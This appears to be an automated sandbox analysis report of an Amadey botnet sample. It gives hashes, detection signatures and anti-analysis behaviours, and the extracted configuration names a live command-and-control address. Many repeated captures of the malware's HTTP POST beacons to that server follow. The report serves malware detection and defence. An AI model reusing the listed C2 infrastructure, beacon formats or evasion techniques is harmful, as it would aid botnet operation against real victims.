Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1519551
MD5:ee97c42201b1bf6c1b166b5ef8ee88b0
SHA1:eb6894654e6c48e98d4cf16d47073bfe9ccfddc8
SHA256:9e595c5513ba6edde325dc5dadb184a977c6e89ef0a3230212628b100a1aba4c
Tags:Amadey, exe, user-Bitsight
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6692 cmdline: "C:\Users\user\Desktop\file.exe" MD5: EE97C42201B1BF6C1B166B5EF8EE88B0)
    • axplong.exe (PID: 6020 cmdline: "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: EE97C42201B1BF6C1B166B5EF8EE88B0)
  • axplong.exe (PID: 5064 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: EE97C42201B1BF6C1B166B5EF8EE88B0)
  • axplong.exe (PID: 2140 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: EE97C42201B1BF6C1B166B5EF8EE88B0)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Amadey | Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
Source | Rule | Description | Author | Strings
00000001.00000003.1755618042.0000000004A80000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000000.00000003.1726972956.0000000004980000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000002.00000003.1759465892.0000000004A80000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000002.00000002.1799745219.00000000002B1000.00000040.00000001.01000000.00000007.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |

Source | Rule | Description | Author | Strings
0.2.file.exe.500000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
2.2.axplong.exe.2b0000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
6.2.axplong.exe.2b0000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
1.2.axplong.exe.2b0000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-26T17:06:13.686528+0200 | 2856147 | 1 | A Network Trojan was detected | 192.168.2.4 | 55659 | 185.215.113.16 | 80 | TCP

                    AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.16/Jo89Ku7d/index.phpY | Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpJ | Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpy1mb3JtLXVybGVuY29kZWQ= | Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpD | Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.php | Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.phpI | Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpz | Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpded | Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.php= | Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpE | Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpX | Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpncoded | Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpncodedV | Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpq | Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.php/ | Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.phpncodedn | Avira URL Cloud: Label: phishing
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000001.00000003.1755618042.0000000004A80000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | ReversingLabs: Detection: 52%
Source: file.exe | ReversingLabs: Detection: 52%
Source: Submited Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Joe Sandbox ML: detected
Source: file.exe | Joe Sandbox ML: detected
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

                    Networking

Source: Network traffic | Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:55659 -> 185.215.113.16:80
Source: Malware configuration extractor | IPs: 185.215.113.16
Source: global traffic | HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.16 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
Source: global traffic | HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 185.215.113.16 | Content-Length: 154 | Cache-Control: no-cache | Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 | Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
